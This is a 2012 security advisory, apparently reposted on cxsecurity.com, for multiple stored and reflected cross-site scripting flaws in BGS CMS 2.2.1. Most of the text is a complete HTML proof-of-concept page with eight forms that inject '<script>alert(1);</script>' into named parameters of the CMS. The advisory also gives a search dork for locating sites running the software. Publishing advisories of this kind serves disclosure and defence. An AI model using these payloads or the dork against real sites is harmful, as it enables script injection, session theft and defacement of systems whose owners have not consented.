BGS CMS 2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities

2012.04.11
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: \"powered by BGS CMS\"

<!-- BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities Vendor: BGSvetionik Product web page: http://www.bgs-cms.com Affected version: 2.2.1 Summary: BGS CMS is powerful Content Management System used to easily publish, manage and organize wide variety of content on the website. Desc: BGS CMS suffers from multiple stored and reflected XSS vulnerabilities when parsing user input to several parameters via GET and POST method (post-auth). Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session. o=====================================================================o | Parameter | Section | Method | Stored XSS | Reflected XSS | |=====================================================================| | | | | | | | redirect | categories | POST | X | | |--------------|---------------|--------|-------------|---------------| | description | ads, products | POST | X | | |--------------|---------------|--------|-------------|---------------| | section | news | GET | | X | |--------------|---------------|--------|-------------|---------------| | name | orders, polls | POST | X | | |--------------|---------------|--------|-------------|---------------| | url | banners | POST | X | | |--------------|---------------|--------|-------------|---------------| | title | gallery | POST | X | | |--------------|---------------|--------|-------------|---------------| | search | search | GET | | X | o=====================================================================o Tested on: Apache 2.2.22 PHP 5.3.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [05.04.2012] Vulnerabilities discovered. [05.04.2012] Initial contact with the vendor. [10.04.2012] No response from the vendor. [11.04.2012] Public security advisory released. Advisory ID: ZSL-2012-5084 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php Dork: footer: "powered by BGS CMS" 05.04.2012 --> <html> <title>BGS CMS v2.2.1 Multiple Stored Cross-Site Scripting Vulnerabilities</title> <body bgcolor="#000000"> <script type="text/javascript"> function xss0(){document.forms["xss0"].submit();} function xss1(){document.forms["xss1"].submit();} function xss2(){document.forms["xss2"].submit();} function xss3(){document.forms["xss3"].submit();} function xss4(){document.forms["xss4"].submit();} function xss5(){document.forms["xss5"].submit();} function xss6(){document.forms["xss6"].submit();} function xss7(){document.forms["xss7"].submit();} </script> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss0"> <input type="hidden" name="name" value="Zero Science Lab" /> <input type="hidden" name="title" value="XSS" /> <input type="hidden" name="description" value="Cross Site Scripting" /> <input type="hidden" name="parent_id" value="15" /> <input type="hidden" name="redirect" value='"><script>alert(1);</script>' /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="categories" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="29" /> </form> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss1"> <input type="hidden" name="title" value="Zero Science Lab" /> <input type="hidden" name="description" value='"><script>alert(1);</script>' /> <input type="hidden" name="disp_on_full_view" value="1" /> <input type="hidden" name="status" value="1" /> <input type="hidden" name="level" value="0" /> <input type="hidden" name="type" value="ads" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="ads" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="0" /> </form> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss2"> <input type="hidden" name="created" value="ZSL" /> <input type="hidden" name="name" value='"><script>alert(1);</script>' /> <input type="hidden" name="email" value="test@test.mk" /> <input type="hidden" name="message" value="t00t" /> <input type="hidden" name="status" value="coolio" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="orders" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss3"> <input type="hidden" name="name" value='"><script>alert(1);</script>' /> <input type="hidden" name="question" value="What is physics?" /> <input type="hidden" name="start" value="10 2012" /> <input type="hidden" name="end" value="18 2012" /> <input type="hidden" name="answer_text[]" value="A warm summer evening." /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="polls" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss4"> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="image" value="joxy.jpg" /> <input type="hidden" name="url" value='"><script>alert(1);</script>' /> <input type="hidden" name="max_displays" value="1" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="banners" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="9" /> </form> <form action="http://localhost/cms/" enctype="application/x-www-form-urlencoded" method="POST" id="xss5"> <input type="hidden" name="title" value='"><script>alert(1);</script>' /> <input type="hidden" name="description" value="Ban" /> <input type="hidden" name="folder" value="sexy_banner_imgx" /> <input type="hidden" name="close" value="OK" /> <input type="hidden" name="section" value="gallery" /> <input type="hidden" name="action" value="edit" /> </form> <form action="http://localhost/" method="GET" id="xss6"> <input type="hidden" name="action" value="search" /> <input type="hidden" name="search" value='"><script>alert(1);</script>' /> <input type="hidden" name="x" value="0" /> <input type="hidden" name="y" value="0" /> </form> <form action="http://localhost/cms/" method="GET" id="xss7"> <input type="hidden" name="section" value='"><script>alert(1);</script>' /> <input type="hidden" name="action" value="add_news" /> </form> <br /><br /> <a href="javascript: xss0();" style="text-decoration:none"> <b><font color="red"><h3>XSS 0</h3></font></b></a><br /> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><h3>XSS 1</h3></font></b></a><br /> <a href="javascript: xss2();" style="text-decoration:none"> <b><font color="red"><h3>XSS 2</h3></font></b></a><br /> <a href="javascript: xss3();" style="text-decoration:none"> <b><font color="red"><h3>XSS 3</h3></font></b></a><br /> <a href="javascript: xss4();" style="text-decoration:none"> <b><font color="red"><h3>XSS 4</h3></font></b></a><br /> <a href="javascript: xss5();" style="text-decoration:none"> <b><font color="red"><h3>XSS 5</h3></font></b></a><br /> <a href="javascript: xss6();" style="text-decoration:none"> <b><font color="red"><h3>XSS 6</h3></font></b></a><br /><br /> <a href="javascript: xss7();" style="text-decoration:none"> <b><font color="red"><h3>XSS 7</h3></font></b></a><br /><br /> </body></html>

References:

http://www.bgs-cms.com
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5084.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top